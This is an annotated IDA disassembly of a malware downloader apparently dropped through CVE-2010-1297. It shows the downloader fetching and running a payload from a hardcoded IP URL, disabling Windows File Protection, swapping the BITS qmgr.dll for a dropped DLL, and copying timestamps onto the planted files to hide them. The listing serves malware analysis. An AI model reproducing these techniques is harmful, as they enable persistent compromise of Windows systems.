.text:00401000 ; .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; | This file has been generated by The Interactive Disassembler (IDA) | .text:00401000 ; | Copyright (c) 2009 by Hex-Rays, | .text:00401000 ; | License info: 48-353D-70D4-28 | .text:00401000 ; | Frank Boldewin, GAD eG | .text:00401000 ; +-------------------------------------------------------------------------+ .text:00401000 ; .text:00401000 ; Input MD5 : C679D3631D19BD527FBF6D5FD9BD0AC5 .text:00401000 .text:00401000 ; File Name : Y:\malware-archiv\cve-2010-1297\dropped-file\downloader.exe .text:00401000 ; Format : Portable executable for 80386 (PE) .text:00401000 ; Imagebase : 400000 .text:00401000 ; Section 1. (virtual address 00001000) .text:00401000 ; Virtual size : 00000952 ( 2386.) .text:00401000 ; Section size in file : 00000A00 ( 2560.) .text:00401000 ; Offset to raw data for section: 00000400 .text:00401000 ; Flags 60000020: Text Executable Readable .text:00401000 ; Alignment : default .text:00401000 ; OS type : MS Windows .text:00401000 ; Application type: Executable 32bit .text:00401000 .text:00401000 .686p .text:00401000 .mmx .text:00401000 .model flat .text:00401000 .text:00401000 ; =========================================================================== .text:00401000 .text:00401000 ; Segment type: Pure code .text:00401000 ; Segment permissions: Read/Execute .text:00401000 _text segment para public 'CODE' use32 .text:00401000 assume cs:_text .text:00401000 ;org 401000h .text:00401000 assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing .text:00401000 .text:00401000 ; =============== S U B R O U T I N E ======================================= .text:00401000 .text:00401000 .text:00401000 ; int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) .text:00401000 _WinMain@16 proc near ; CODE XREF: start+12Fp .text:00401000 .text:00401000 NumberOfBytesWritten= dword ptr -0C68h .text:00401000 hResData = dword ptr -0C64h .text:00401000 ServiceName = byte ptr -0C60h .text:00401000 var_C5C = byte ptr -0C5Ch .text:00401000 var_C5B = byte ptr -0C5Bh .text:00401000 Buffer = byte ptr -0B60h .text:00401000 var_A5C = dword ptr -0A5Ch .text:00401000 ExistingFileName= byte ptr -958h .text:00401000 MultiByteStr = byte ptr -854h .text:00401000 var_750 = byte ptr -750h .text:00401000 var_70F = byte ptr -70Fh .text:00401000 var_650 = byte ptr -650h .text:00401000 var_54C = dword ptr -54Ch .text:00401000 CmdLine = byte ptr -448h .text:00401000 FindFileData = _WIN32_FIND_DATAA ptr -348h .text:00401000 FileName = byte ptr -208h .text:00401000 NewFileName = byte ptr -104h .text:00401000 hInstance = dword ptr 4 .text:00401000 hPrevInstance = dword ptr 8 .text:00401000 lpCmdLine = dword ptr 0Ch .text:00401000 nShowCmd = dword ptr 10h .text:00401000 .text:00401000 81 EC 68 0C 00 00 sub esp, 0C68h .text:00401006 A1 F8 30 40 00 mov eax, dword ptr aBITS ; "BITS" .text:0040100B 8A 0D FC 30 40 00 mov cl, byte ptr aBITS+4 .text:00401011 56 push esi .text:00401012 57 push edi .text:00401013 89 44 24 10 mov dword ptr [esp+0C70h+ServiceName], eax .text:00401017 88 4C 24 14 mov [esp+0C70h+var_C5C], cl .text:0040101B B9 3E 00 00 00 mov ecx, 3Eh .text:00401020 33 C0 xor eax, eax .text:00401022 8D 7C 24 15 lea edi, [esp+0C70h+var_C5B] .text:00401026 8D 94 24 10 01 00 00 lea edx, [esp+0C70h+Buffer] .text:0040102D F3 AB rep stosd .text:0040102F 66 AB stosw .text:00401031 68 04 01 00 00 push 104h ; uSize .text:00401036 52 push edx ; lpBuffer .text:00401037 AA stosb .text:00401038 FF 15 3C 20 40 00 call ds:GetSystemDirectoryA .text:0040103E 85 C0 test eax, eax .text:00401040 0F 84 82 01 00 00 jz SomethingFailed .text:00401046 8D 84 24 10 01 00 00 lea eax, [esp+0C70h+Buffer] .text:0040104D 8D 8C 24 6C 0B 00 00 lea ecx, [esp+0C70h+NewFileName] .text:00401054 50 push eax .text:00401055 68 E0 30 40 00 push offset Format ; "%s\\dllcache\\qmgr.dll" .text:0040105A 51 push ecx ; Dest .text:0040105B E8 50 07 00 00 call sprintf .text:00401060 83 C4 0C add esp, 0Ch .text:00401063 8D 94 24 10 01 00 00 lea edx, [esp+0C70h+Buffer] .text:0040106A 8D 84 24 1C 04 00 00 lea eax, [esp+0C70h+MultiByteStr] .text:00401071 52 push edx .text:00401072 68 D4 30 40 00 push offset aSQmgr_dll ; "%s\\qmgr.dll" .text:00401077 50 push eax ; Dest .text:00401078 E8 33 07 00 00 call sprintf .text:0040107D 83 C4 0C add esp, 0Ch .text:00401080 8D 8C 24 10 01 00 00 lea ecx, [esp+0C70h+Buffer] .text:00401087 8D 94 24 14 02 00 00 lea edx, [esp+0C70h+var_A5C] .text:0040108E 51 push ecx .text:0040108F 68 C4 30 40 00 push offset aSKernel64_dll ; "%s\\kernel64.dll" .text:00401094 52 push edx ; Dest .text:00401095 E8 16 07 00 00 call sprintf .text:0040109A 83 C4 0C add esp, 0Ch .text:0040109D 8D 84 24 10 01 00 00 lea eax, [esp+0C70h+Buffer] .text:004010A4 8D 8C 24 24 07 00 00 lea ecx, [esp+0C70h+var_54C] .text:004010AB 50 push eax .text:004010AC 68 B8 30 40 00 push offset aSEs_ini ; "%s\\es.ini" .text:004010B1 51 push ecx ; Dest .text:004010B2 E8 F9 06 00 00 call sprintf .text:004010B7 83 C4 0C add esp, 0Ch .text:004010BA 8D 94 24 20 06 00 00 lea edx, [esp+0C70h+var_650] .text:004010C1 68 04 01 00 00 push 104h ; uSize .text:004010C6 52 push edx ; lpBuffer .text:004010C7 FF 15 48 20 40 00 call ds:GetWindowsDirectoryA .text:004010CD 85 C0 test eax, eax .text:004010CF 0F 84 F3 00 00 00 jz SomethingFailed .text:004010D5 8D 84 24 20 06 00 00 lea eax, [esp+0C70h+var_650] .text:004010DC 8D 8C 24 18 03 00 00 lea ecx, [esp+0C70h+ExistingFileName] .text:004010E3 50 push eax .text:004010E4 68 A4 30 40 00 push offset aSEventsystem_d ; "%s\\EventSystem.dll" .text:004010E9 51 push ecx ; Dest .text:004010EA E8 C1 06 00 00 call sprintf .text:004010EF 83 C4 0C add esp, 0Ch .text:004010F2 8D 94 24 20 06 00 00 lea edx, [esp+0C70h+var_650] .text:004010F9 8D 84 24 68 0A 00 00 lea eax, [esp+0C70h+FileName] .text:00401100 52 push edx .text:00401101 68 80 30 40 00 push offset aSServicepackfi ; "%s\\ServicePackFiles\\i386\\qmgr.dll" .text:00401106 50 push eax ; Dest .text:00401107 E8 A4 06 00 00 call sprintf .text:0040110C 83 C4 0C add esp, 0Ch .text:0040110F E8 CC 02 00 00 call CheckIfLocalAccountIsAdmin .text:00401114 85 C0 test eax, eax .text:00401116 0F 85 BA 00 00 00 jnz AccountWasPrivileged .text:0040111C 50 push eax ; pvReserved .text:0040111D FF 15 D0 20 40 00 call ds:CoInitialize .text:00401123 B9 10 00 00 00 mov ecx, 10h .text:00401128 BE 3C 30 40 00 mov esi, offset aHttp210_211_31 ; "http://210.211.31.214/img/xslu.exe" .text:0040112D 8D BC 24 20 05 00 00 lea edi, [esp+0C70h+var_750] .text:00401134 33 C0 xor eax, eax .text:00401136 F3 A5 rep movsd .text:00401138 A4 movsb .text:00401139 B9 2F 00 00 00 mov ecx, 2Fh .text:0040113E 8D BC 24 61 05 00 00 lea edi, [esp+0C70h+var_70F] .text:00401145 F3 AB rep stosd .text:00401147 66 AB stosw .text:00401149 8D 8C 24 28 09 00 00 lea ecx, [esp+0C70h+FindFileData] .text:00401150 68 00 01 00 00 push 100h ; nSize .text:00401155 51 push ecx ; lpBuffer .text:00401156 68 34 30 40 00 push offset Name ; "TEMP" .text:0040115B AA stosb .text:0040115C FF 15 4C 20 40 00 call ds:GetEnvironmentVariableA .text:00401162 85 C0 test eax, eax .text:00401164 74 62 jz short SomethingFailed .text:00401166 8D 94 24 28 09 00 00 lea edx, [esp+0C70h+FindFileData] .text:0040116D 8D 84 24 28 08 00 00 lea eax, [esp+0C70h+CmdLine] .text:00401174 52 push edx .text:00401175 68 28 30 40 00 push offset aS1yxf_exe ; "%s\\1yxf.exe" .text:0040117A 50 push eax ; Dest .text:0040117B E8 30 06 00 00 call sprintf .text:00401180 83 C4 0C add esp, 0Ch .text:00401183 8D 8C 24 20 05 00 00 lea ecx, [esp+0C70h+var_750] .text:0040118A 51 push ecx .text:0040118B FF 15 C8 20 40 00 call ds:DeleteUrlCacheEntry .text:00401191 6A 00 push 0 ; LPBINDSTATUSCALLBACK .text:00401193 8D 94 24 2C 08 00 00 lea edx, [esp+0C74h+CmdLine] .text:0040119A 6A 00 push 0 ; DWORD .text:0040119C 8D 84 24 28 05 00 00 lea eax, [esp+0C78h+var_750] .text:004011A3 52 push edx ; LPCSTR .text:004011A4 50 push eax ; LPCSTR .text:004011A5 6A 00 push 0 ; LPUNKNOWN .text:004011A7 E8 A0 07 00 00 call URLDownloadToFileA ; Download file and store it into .text:004011A7 ; windows temp dir as 1yxf.exe .text:004011A7 ; .text:004011AC 85 C0 test eax, eax .text:004011AE 75 18 jnz short SomethingFailed .text:004011B0 8D 8C 24 28 08 00 00 lea ecx, [esp+0C70h+CmdLine] .text:004011B7 50 push eax ; uCmdShow .text:004011B8 51 push ecx ; lpCmdLine .text:004011B9 FF 15 50 20 40 00 call ds:WinExec ; ...and Execute it .text:004011BF 83 F8 1F cmp eax, 1Fh .text:004011C2 0F 87 01 02 00 00 ja ExecutionWasOk .text:004011C8 .text:004011C8 SomethingFailed: ; CODE XREF: WinMain(x,x,x,x)+40j .text:004011C8 ; WinMain(x,x,x,x)+CFj ... .text:004011C8 5F pop edi .text:004011C9 83 C8 FF or eax, 0FFFFFFFFh .text:004011CC 5E pop esi .text:004011CD 81 C4 68 0C 00 00 add esp, 0C68h .text:004011D3 C2 10 00 retn 10h .text:004011D6 ; --------------------------------------------------------------------------- .text:004011D6 .text:004011D6 AccountWasPrivileged: ; CODE XREF: WinMain(x,x,x,x)+116j .text:004011D6 8D 94 24 28 09 00 00 lea edx, [esp+0C70h+FindFileData] .text:004011DD 8D 84 24 18 03 00 00 lea eax, [esp+0C70h+ExistingFileName] .text:004011E4 52 push edx ; lpFindFileData .text:004011E5 50 push eax ; c:\windows\EventSystem.dll .text:004011E6 FF 15 54 20 40 00 call ds:FindFirstFileA .text:004011EC 83 F8 FF cmp eax, 0FFFFFFFFh .text:004011EF 74 15 jz short EventSystem_DLLnotfound .text:004011F1 50 push eax ; hFindFile .text:004011F2 FF 15 58 20 40 00 call ds:FindClose .text:004011F8 5F pop edi .text:004011F9 83 C8 FF or eax, 0FFFFFFFFh .text:004011FC 5E pop esi .text:004011FD 81 C4 68 0C 00 00 add esp, 0C68h .text:00401203 C2 10 00 retn 10h .text:00401206 ; --------------------------------------------------------------------------- .text:00401206 .text:00401206 EventSystem_DLLnotfound: ; CODE XREF: WinMain(x,x,x,x)+1EFj .text:00401206 8B 3D 5C 20 40 00 mov edi, ds:FindResourceA .text:0040120C 53 push ebx .text:0040120D 55 push ebp .text:0040120E 68 1C 30 40 00 push offset Type ; "SERV_DLL" .text:00401213 6A 65 push 65h ; lpName .text:00401215 6A 00 push 0 ; hModule .text:00401217 C7 44 24 1C 00 00 00 00 mov [esp+0C84h+NumberOfBytesWritten], 0 .text:0040121F FF D7 call edi ; FindResourceA .text:00401221 8B 1D 60 20 40 00 mov ebx, ds:SizeofResource .text:00401227 8B F0 mov esi, eax .text:00401229 56 push esi ; hResInfo .text:0040122A 6A 00 push 0 ; hModule .text:0040122C FF D3 call ebx ; SizeofResource .text:0040122E 56 push esi ; hResInfo .text:0040122F 6A 00 push 0 ; hModule .text:00401231 8B E8 mov ebp, eax .text:00401233 FF 15 64 20 40 00 call ds:LoadResource .text:00401239 6A 00 push 0 ; hTemplateFile .text:0040123B 68 A0 00 00 00 push 0A0h ; dwFlagsAndAttributes .text:00401240 6A 02 push 2 ; dwCreationDisposition .text:00401242 6A 00 push 0 ; lpSecurityAttributes .text:00401244 6A 07 push 7 ; dwShareMode .text:00401246 8D 8C 24 34 03 00 00 lea ecx, [esp+0C8Ch+ExistingFileName] .text:0040124D 68 FF 03 1F 00 push 1F03FFh ; dwDesiredAccess .text:00401252 51 push ecx ; lpFileName .text:00401253 89 44 24 30 mov [esp+0C94h+hResData], eax .text:00401257 FF 15 6C 20 40 00 call ds:CreateFileA ; Drop c:\windows\EventSystem.dll .text:0040125D 8D 54 24 10 lea edx, [esp+0C78h+NumberOfBytesWritten] .text:00401261 8B F0 mov esi, eax .text:00401263 8B 44 24 14 mov eax, [esp+0C78h+hResData] .text:00401267 6A 00 push 0 ; lpOverlapped .text:00401269 52 push edx ; lpNumberOfBytesWritten .text:0040126A 55 push ebp ; nNumberOfBytesToWrite .text:0040126B 8B 2D 70 20 40 00 mov ebp, ds:LockResource .text:00401271 50 push eax ; hResData .text:00401272 FF D5 call ebp ; LockResource .text:00401274 50 push eax ; lpBuffer .text:00401275 56 push esi ; hFile .text:00401276 FF 15 74 20 40 00 call ds:WriteFile .text:0040127C 56 push esi ; hObject .text:0040127D FF 15 78 20 40 00 call ds:CloseHandle .text:00401283 68 10 30 40 00 push offset aServ_ini ; "SERV_INI" .text:00401288 6A 66 push 66h ; lpName .text:0040128A 6A 00 push 0 ; hModule .text:0040128C FF D7 call edi ; FindResourceA .text:0040128E 8B F0 mov esi, eax .text:00401290 56 push esi ; hResInfo .text:00401291 6A 00 push 0 ; hModule .text:00401293 FF D3 call ebx ; SizeofResource .text:00401295 56 push esi ; hResInfo .text:00401296 6A 00 push 0 ; hModule .text:00401298 8B F8 mov edi, eax .text:0040129A FF 15 64 20 40 00 call ds:LoadResource .text:004012A0 6A 00 push 0 ; hTemplateFile .text:004012A2 68 A0 00 00 00 push 0A0h ; dwFlagsAndAttributes .text:004012A7 6A 02 push 2 ; dwCreationDisposition .text:004012A9 6A 00 push 0 ; lpSecurityAttributes .text:004012AB 6A 07 push 7 ; dwShareMode .text:004012AD 8D 8C 24 40 07 00 00 lea ecx, [esp+0C8Ch+var_54C] .text:004012B4 68 FF 03 1F 00 push 1F03FFh ; dwDesiredAccess .text:004012B9 51 push ecx ; lpFileName .text:004012BA 8B D8 mov ebx, eax .text:004012BC FF 15 6C 20 40 00 call ds:CreateFileA ; Drop c:\windows\system32\es.ini .text:004012C2 8D 54 24 10 lea edx, [esp+0C78h+NumberOfBytesWritten] .text:004012C6 6A 00 push 0 ; lpOverlapped .text:004012C8 52 push edx ; lpNumberOfBytesWritten .text:004012C9 57 push edi ; nNumberOfBytesToWrite .text:004012CA 53 push ebx ; hResData .text:004012CB 8B F0 mov esi, eax .text:004012CD FF D5 call ebp ; LockResource .text:004012CF 50 push eax ; lpBuffer .text:004012D0 56 push esi ; hFile .text:004012D1 FF 15 74 20 40 00 call ds:WriteFile .text:004012D7 56 push esi ; hObject .text:004012D8 FF 15 78 20 40 00 call ds:CloseHandle .text:004012DE 8D 44 24 18 lea eax, [esp+0C78h+ServiceName] .text:004012E2 6A 04 push 4 ; dwStartType = DEACTIVATE .text:004012E4 50 push eax ; lpServiceName .text:004012E5 E8 B6 02 00 00 call ManipulateBITSService .text:004012EA 83 C4 08 add esp, 8 .text:004012ED 5D pop ebp .text:004012EE 83 F8 FF cmp eax, 0FFFFFFFFh .text:004012F1 5B pop ebx .text:004012F2 0F 84 D0 FE FF FF jz SomethingFailed .text:004012F8 8D 4C 24 10 lea ecx, [esp+0C70h+ServiceName] .text:004012FC 51 push ecx ; lpServiceName .text:004012FD E8 2E 03 00 00 call StopBITS .text:00401302 8B 35 68 20 40 00 mov esi, ds:Sleep .text:00401308 83 C4 04 add esp, 4 .text:0040130B 6A 01 push 1 ; dwMilliseconds .text:0040130D FF D6 call esi ; Sleep .text:0040130F 8D 94 24 1C 04 00 00 lea edx, [esp+0C70h+MultiByteStr] .text:00401316 52 push edx ; lpMultiByteStr .text:00401317 E8 64 01 00 00 call DisableWindowsFileProtection .text:0040131C 83 C4 04 add esp, 4 .text:0040131F 6A 01 push 1 ; dwMilliseconds .text:00401321 FF D6 call esi ; Sleep .text:00401323 8D 84 24 68 0A 00 00 lea eax, [esp+0C70h+FileName] .text:0040132A 8D 8C 24 18 03 00 00 lea ecx, [esp+0C70h+ExistingFileName] .text:00401331 50 push eax ; lpFileName .text:00401332 8D 94 24 20 04 00 00 lea edx, [esp+0C74h+MultiByteStr] .text:00401339 51 push ecx ; lpExistingFileName .text:0040133A 8D 84 24 1C 02 00 00 lea eax, [esp+0C78h+var_A5C] .text:00401341 52 push edx ; int .text:00401342 8D 8C 24 78 0B 00 00 lea ecx, [esp+0C7Ch+NewFileName] .text:00401349 50 push eax ; int .text:0040134A 51 push ecx ; lpNewFileName .text:0040134B E8 B0 03 00 00 call ReplaceOriginalQMGR_DLLwithEventSystem_DLL .text:00401350 83 C4 14 add esp, 14h .text:00401353 83 F8 FF cmp eax, 0FFFFFFFFh .text:00401356 0F 84 6C FE FF FF jz SomethingFailed .text:0040135C 8D 94 24 14 02 00 00 lea edx, [esp+0C70h+var_A5C] .text:00401363 8D 84 24 18 03 00 00 lea eax, [esp+0C70h+ExistingFileName] .text:0040136A 52 push edx ; c:\windows\EventSystem.dll .text:0040136B 50 push eax ; int .text:0040136C E8 7F 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime .text:00401371 8D 8C 24 1C 02 00 00 lea ecx, [esp+0C78h+var_A5C] .text:00401378 8D 94 24 24 04 00 00 lea edx, [esp+0C78h+MultiByteStr] .text:0040137F 51 push ecx ; c:\windows\system32\qmgr.dll .text:00401380 52 push edx ; int .text:00401381 E8 6A 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime .text:00401386 8D 84 24 24 02 00 00 lea eax, [esp+0C80h+var_A5C] .text:0040138D 8D 8C 24 34 07 00 00 lea ecx, [esp+0C80h+var_54C] .text:00401394 50 push eax ; es.ini .text:00401395 51 push ecx ; int .text:00401396 E8 55 01 00 00 call SetFakeQMGRToOriginalQMGRFiletime .text:0040139B 8D 54 24 28 lea edx, [esp+0C88h+ServiceName] .text:0040139F 6A 02 push 2 ; dwStartType = Automatic .text:004013A1 52 push edx ; lpServiceName .text:004013A2 E8 F9 01 00 00 call ManipulateBITSService .text:004013A7 83 C4 20 add esp, 20h .text:004013AA 83 F8 FF cmp eax, 0FFFFFFFFh .text:004013AD 0F 84 15 FE FF FF jz SomethingFailed .text:004013B3 8D 44 24 10 lea eax, [esp+0C70h+ServiceName] .text:004013B7 50 push eax ; lpServiceName .text:004013B8 E8 E3 02 00 00 call StartBITS .text:004013BD 83 C4 04 add esp, 4 .text:004013C0 83 F8 FF cmp eax, 0FFFFFFFFh .text:004013C3 0F 84 FF FD FF FF jz SomethingFailed .text:004013C9 .text:004013C9 ExecutionWasOk: ; CODE XREF: WinMain(x,x,x,x)+1C2j .text:004013C9 5F pop edi .text:004013CA 33 C0 xor eax, eax .text:004013CC 5E pop esi .text:004013CD 81 C4 68 0C 00 00 add esp, 0C68h .text:004013D3 C2 10 00 retn 10h .text:004013D3 _WinMain@16 endp .text:004013D3 .text:004013D3 ; --------------------------------------------------------------------------- .text:004013D6 90 90 90 90 90 90 90 90+ align 10h .text:004013E0 .text:004013E0 ; =============== S U B R O U T I N E ======================================= .text:004013E0 .text:004013E0 .text:004013E0 CheckIfLocalAccountIsAdmin proc near ; CODE XREF: WinMain(x,x,x,x)+10Fp .text:004013E0 .text:004013E0 var_10 = dword ptr -10h .text:004013E0 pSid = dword ptr -0Ch .text:004013E0 pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY ptr -8 .text:004013E0 .text:004013E0 83 EC 10 sub esp, 10h .text:004013E3 53 push ebx .text:004013E4 56 push esi .text:004013E5 33 DB xor ebx, ebx .text:004013E7 68 10 31 40 00 push offset ProcName ; "CheckTokenMembership" .text:004013EC 68 00 31 40 00 push offset LibFileName ; "Advapi32.dll" .text:004013F1 88 5C 24 18 mov [esp+20h+pIdentifierAuthority.Value], bl .text:004013F5 88 5C 24 19 mov [esp+20h+pIdentifierAuthority.Value+1], bl .text:004013F9 88 5C 24 1A mov [esp+20h+pIdentifierAuthority.Value+2], bl .text:004013FD 88 5C 24 1B mov [esp+20h+pIdentifierAuthority.Value+3], bl .text:00401401 88 5C 24 1C mov [esp+20h+pIdentifierAuthority.Value+4], bl .text:00401405 C6 44 24 1D 05 mov [esp+20h+pIdentifierAuthority.Value+5], 5 ; SECURITY_NT_AUTHORITY .text:0040140A FF 15 30 20 40 00 call ds:LoadLibraryA .text:00401410 50 push eax ; hModule .text:00401411 FF 15 2C 20 40 00 call ds:GetProcAddress .text:00401417 8B F0 mov esi, eax .text:00401419 3B F3 cmp esi, ebx .text:0040141B 75 0B jnz short loc_401428 .text:0040141D 5E pop esi .text:0040141E B8 01 00 00 00 mov eax, 1 .text:00401423 5B pop ebx .text:00401424 83 C4 10 add esp, 10h .text:00401427 C3 retn .text:00401428 ; --------------------------------------------------------------------------- .text:00401428 .text:00401428 loc_401428: ; CODE XREF: CheckIfLocalAccountIsAdmin+3Bj .text:00401428 8D 44 24 0C lea eax, [esp+18h+pSid] .text:0040142C 8D 4C 24 10 lea ecx, [esp+18h+pIdentifierAuthority] .text:00401430 50 push eax ; pSid .text:00401431 53 push ebx ; nSubAuthority7 .text:00401432 53 push ebx ; nSubAuthority6 .text:00401433 53 push ebx ; nSubAuthority5 .text:00401434 53 push ebx ; nSubAuthority4 .text:00401435 53 push ebx ; nSubAuthority3 .text:00401436 53 push ebx ; nSubAuthority2 .text:00401437 68 20 02 00 00 push 220h ; nSubAuthority1 .text:0040143C 6A 20 push 20h ; nSubAuthority0 .text:0040143E 6A 02 push 2 ; nSubAuthorityCount .text:00401440 51 push ecx ; pIdentifierAuthority .text:00401441 FF 15 20 20 40 00 call ds:AllocateAndInitializeSid .text:00401447 3B C3 cmp eax, ebx .text:00401449 89 44 24 08 mov [esp+18h+var_10], eax .text:0040144D 74 24 jz short loc_401473 .text:0040144F 8B 44 24 0C mov eax, [esp+18h+pSid] .text:00401453 8D 54 24 08 lea edx, [esp+18h+var_10] .text:00401457 52 push edx .text:00401458 50 push eax .text:00401459 53 push ebx .text:0040145A FF D6 call esi ; CheckTokenMembership .text:0040145C 85 C0 test eax, eax .text:0040145E 75 04 jnz short loc_401464 .text:00401460 89 5C 24 08 mov [esp+18h+var_10], ebx .text:00401464 .text:00401464 loc_401464: ; CODE XREF: CheckIfLocalAccountIsAdmin+7Ej .text:00401464 8B 4C 24 0C mov ecx, [esp+18h+pSid] .text:00401468 51 push ecx ; pSid .text:00401469 FF 15 24 20 40 00 call ds:FreeSid .text:0040146F 8B 44 24 08 mov eax, [esp+18h+var_10] .text:00401473 .text:00401473 loc_401473: ; CODE XREF: CheckIfLocalAccountIsAdmin+6Dj .text:00401473 5E pop esi .text:00401474 5B pop ebx .text:00401475 83 C4 10 add esp, 10h .text:00401478 C3 retn .text:00401478 CheckIfLocalAccountIsAdmin endp .text:00401478 .text:00401478 ; --------------------------------------------------------------------------- .text:00401479 90 90 90 90 90 90 90 align 10h .text:00401480 .text:00401480 ; =============== S U B R O U T I N E ======================================= .text:00401480 .text:00401480 .text:00401480 ; int __cdecl DisableWindowsFileProtection(LPCSTR lpMultiByteStr) .text:00401480 DisableWindowsFileProtection proc near ; CODE XREF: WinMain(x,x,x,x)+317p .text:00401480 .text:00401480 WideCharStr = word ptr -208h .text:00401480 var_206 = byte ptr -206h .text:00401480 lpMultiByteStr = dword ptr 4 .text:00401480 .text:00401480 81 EC 08 02 00 00 sub esp, 208h .text:00401486 56 push esi .text:00401487 57 push edi .text:00401488 6A 05 push 5 ; Ordinal 5 == SetSfcFileException .text:0040148A 68 28 31 40 00 push offset aSfc_os_dll ; "sfc_os.dll" .text:0040148F FF 15 30 20 40 00 call ds:LoadLibraryA .text:00401495 50 push eax ; hModule .text:00401496 FF 15 2C 20 40 00 call ds:GetProcAddress .text:0040149C 8B F0 mov esi, eax .text:0040149E B9 81 00 00 00 mov ecx, 81h .text:004014A3 33 C0 xor eax, eax .text:004014A5 8D 7C 24 0A lea edi, [esp+210h+var_206] .text:004014A9 66 C7 44 24 08 00 00 mov [esp+210h+WideCharStr], 0 .text:004014B0 68 04 01 00 00 push 104h ; cchWideChar .text:004014B5 F3 AB rep stosd .text:004014B7 8B 8C 24 18 02 00 00 mov ecx, [esp+214h+lpMultiByteStr] .text:004014BE 66 AB stosw .text:004014C0 8D 44 24 0C lea eax, [esp+214h+WideCharStr] .text:004014C4 50 push eax ; lpWideCharStr .text:004014C5 68 04 01 00 00 push 104h ; cbMultiByte .text:004014CA 51 push ecx ; lpMultiByteStr .text:004014CB 6A 00 push 0 ; dwFlags .text:004014CD 6A 00 push 0 ; CodePage .text:004014CF FF 15 34 20 40 00 call ds:MultiByteToWideChar .text:004014D5 8D 54 24 08 lea edx, [esp+210h+WideCharStr] .text:004014D9 6A FF push 0FFFFFFFFh .text:004014DB 52 push edx .text:004014DC 6A 00 push 0 .text:004014DE FF D6 call esi .text:004014E0 5F pop edi .text:004014E1 5E pop esi .text:004014E2 81 C4 08 02 00 00 add esp, 208h .text:004014E8 C3 retn .text:004014E8 DisableWindowsFileProtection endp .text:004014E8 .text:004014E8 ; --------------------------------------------------------------------------- .text:004014E9 90 90 90 90 90 90 90 align 10h .text:004014F0 .text:004014F0 ; =============== S U B R O U T I N E ======================================= .text:004014F0 .text:004014F0 .text:004014F0 ; int __cdecl SetFakeQMGRToOriginalQMGRFiletime(int, LPCSTR lpFileName) .text:004014F0 SetFakeQMGRToOriginalQMGRFiletime proc near .text:004014F0 ; CODE XREF: WinMain(x,x,x,x)+36Cp .text:004014F0 ; WinMain(x,x,x,x)+381p ... .text:004014F0 .text:004014F0 LastWriteTime = _FILETIME ptr -18h .text:004014F0 LastAccessTime = _FILETIME ptr -10h .text:004014F0 CreationTime = _FILETIME ptr -8 .text:004014F0 arg_0 = dword ptr 4 .text:004014F0 lpFileName = dword ptr 8 .text:004014F0 .text:004014F0 83 EC 18 sub esp, 18h .text:004014F3 8B 44 24 20 mov eax, [esp+18h+lpFileName] .text:004014F7 56 push esi .text:004014F8 8B 35 6C 20 40 00 mov esi, ds:CreateFileA .text:004014FE 57 push edi .text:004014FF 6A 00 push 0 ; hTemplateFile .text:00401501 68 80 00 00 00 push 80h ; dwFlagsAndAttributes .text:00401506 6A 03 push 3 ; dwCreationDisposition .text:00401508 6A 00 push 0 ; lpSecurityAttributes .text:0040150A 6A 01 push 1 ; dwShareMode .text:0040150C 68 00 00 00 80 push 80000000h ; dwDesiredAccess .text:00401511 50 push eax ; lpFileName .text:00401512 FF D6 call esi ; CreateFileA .text:00401514 8B F8 mov edi, eax .text:00401516 83 FF FF cmp edi, 0FFFFFFFFh .text:00401519 74 6D jz short loc_401588 .text:0040151B 8B 4C 24 24 mov ecx, [esp+20h+arg_0] .text:0040151F 6A 00 push 0 ; hTemplateFile .text:00401521 68 80 00 00 00 push 80h ; dwFlagsAndAttributes .text:00401526 6A 03 push 3 ; dwCreationDisposition .text:00401528 6A 00 push 0 ; lpSecurityAttributes .text:0040152A 6A 01 push 1 ; dwShareMode .text:0040152C 68 00 00 00 40 push 40000000h ; dwDesiredAccess .text:00401531 51 push ecx ; lpFileName .text:00401532 FF D6 call esi ; CreateFileA .text:00401534 8B F0 mov esi, eax .text:00401536 83 FE FF cmp esi, 0FFFFFFFFh .text:00401539 74 4D jz short loc_401588 .text:0040153B 8D 54 24 08 lea edx, [esp+20h+LastWriteTime] .text:0040153F 8D 44 24 10 lea eax, [esp+20h+LastAccessTime] .text:00401543 52 push edx ; lpLastWriteTime .text:00401544 8D 4C 24 1C lea ecx, [esp+24h+CreationTime] .text:00401548 50 push eax ; lpLastAccessTime .text:00401549 51 push ecx ; lpCreationTime .text:0040154A 57 push edi ; hFile .text:0040154B FF 15 7C 20 40 00 call ds:GetFileTime .text:00401551 85 C0 test eax, eax .text:00401553 74 33 jz short loc_401588 .text:00401555 8D 54 24 08 lea edx, [esp+20h+LastWriteTime] .text:00401559 8D 44 24 10 lea eax, [esp+20h+LastAccessTime] .text:0040155D 52 push edx ; lpLastWriteTime .text:0040155E 8D 4C 24 1C lea ecx, [esp+24h+CreationTime] .text:00401562 50 push eax ; lpLastAccessTime .text:00401563 51 push ecx ; lpCreationTime .text:00401564 56 push esi ; hFile .text:00401565 FF 15 38 20 40 00 call ds:SetFileTime .text:0040156B 85 C0 test eax, eax .text:0040156D 57 push edi ; hObject .text:0040156E 8B 3D 78 20 40 00 mov edi, ds:CloseHandle .text:00401574 74 0D jz short loc_401583 .text:00401576 FF D7 call edi ; CloseHandle .text:00401578 56 push esi ; hObject .text:00401579 FF D7 call edi ; CloseHandle .text:0040157B 5F pop edi .text:0040157C 33 C0 xor eax, eax .text:0040157E 5E pop esi .text:0040157F 83 C4 18 add esp, 18h .text:00401582 C3 retn .text:00401583 ; --------------------------------------------------------------------------- .text:00401583 .text:00401583 loc_401583: ; CODE XREF: SetFakeQMGRToOriginalQMGRFiletime+84j .text:00401583 FF D7 call edi ; CloseHandle .text:00401585 56 push esi ; hObject .text:00401586 FF D7 call edi ; CloseHandle .text:00401588 .text:00401588 loc_401588: ; CODE XREF: SetFakeQMGRToOriginalQMGRFiletime+29j .text:00401588 ; SetFakeQMGRToOriginalQMGRFiletime+49j ... .text:00401588 5F pop edi .text:00401589 83 C8 FF or eax, 0FFFFFFFFh .text:0040158C 5E pop esi .text:0040158D 83 C4 18 add esp, 18h .text:00401590 C3 retn .text:00401590 SetFakeQMGRToOriginalQMGRFiletime endp .text:00401590 .text:00401590 ; --------------------------------------------------------------------------- .text:00401591 90 90 90 90 90 90 90 90+ align 10h .text:004015A0 .text:004015A0 ; =============== S U B R O U T I N E ======================================= .text:004015A0 